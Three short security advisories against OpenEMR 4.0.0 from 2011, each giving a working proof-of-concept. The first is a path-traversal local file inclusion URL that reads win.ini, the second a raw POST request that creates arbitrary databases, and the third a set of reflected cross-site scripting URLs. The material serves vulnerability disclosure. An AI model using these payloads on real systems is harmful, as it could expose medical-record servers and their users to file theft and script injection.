87 lines
No EOL
2.9 KiB
Text
87 lines
No EOL
2.9 KiB
Text
------------------------------------------------------------------------
|
|
Software................OpenEMR 4.0.0
|
|
Vulnerability...........Local File Inclusion
|
|
Threat Level............Critical (4/5)
|
|
Download................http://www.oemr.org/
|
|
Discovery Date..........4/2/2011
|
|
Tested On...............Windows Vista + XAMPP
|
|
------------------------------------------------------------------------
|
|
Author..................AutoSec Tools
|
|
Site....................http://www.autosectools.com/
|
|
Email...................John Leitch <john@autosectools.com>
|
|
------------------------------------------------------------------------
|
|
|
|
|
|
--Description--
|
|
|
|
A local file inclusion vulnerability in OpenEMR 4.0.0 can be exploited
|
|
to include arbitrary files.
|
|
|
|
|
|
--PoC--
|
|
|
|
http://localhost/openemr-4.0.0/index.php?site=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
|
|
|
|
------------------------------------------------------------------------
|
|
Software................OpenEMR 4.0.0
|
|
Vulnerability...........Arbitrary Database Creation/Database Enumeration
|
|
Threat Level............Low (1/5)
|
|
Download................http://www.oemr.org/
|
|
Discovery Date..........4/2/2011
|
|
Tested On...............Windows Vista + XAMPP
|
|
------------------------------------------------------------------------
|
|
Author..................AutoSec Tools
|
|
Site....................http://www.autosectools.com/
|
|
Email...................John Leitch <john@autosectools.com>
|
|
------------------------------------------------------------------------
|
|
|
|
|
|
--PoC--
|
|
|
|
POST http://localhost/openemr-4.0.0/contrib/util/express.php HTTP/1.1
|
|
Host: localhost
|
|
Connection: keep-alive
|
|
User-Agent: x
|
|
Content-Length: 142
|
|
Cache-Control: max-age=0
|
|
Origin: null
|
|
Content-Type: multipart/form-data; boundary=----x
|
|
Accept: text/html
|
|
Accept-Language: en-US,en;q=0.8
|
|
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
|
|
|
------x
|
|
Content-Disposition: form-data; name="submit"
|
|
|
|
submit
|
|
------x
|
|
Content-Disposition: form-data; name="newname"
|
|
|
|
DatabaseName
|
|
------x--
|
|
|
|
------------------------------------------------------------------------
|
|
Software................OpenEMR 4.0.0
|
|
Vulnerability...........Reflected Cross-site Scripting
|
|
Threat Level............Low (1/5)
|
|
Download................http://www.oemr.org/
|
|
Discovery Date..........4/2/2011
|
|
Tested On...............Windows Vista + XAMPP
|
|
------------------------------------------------------------------------
|
|
Author..................AutoSec Tools
|
|
Site....................http://www.autosectools.com/
|
|
Email...................John Leitch <john@autosectools.com>
|
|
------------------------------------------------------------------------
|
|
|
|
|
|
--Description--
|
|
|
|
A reflected cross-site scripting vulnerability in OpenEMR 4.0.0 can be
|
|
exploited to execute arbitrary JavaScript.
|
|
|
|
|
|
--PoC--
|
|
|
|
http://localhost/openemr-4.0.0/setup.php?site=%3Cscript%3Ealert(0)%3C/script%3E
|
|
|
|
http://localhost/openemr-4.0.0/gacl/admin/object_search.php?object_type=&action=&src_form=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E§ion_value=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E |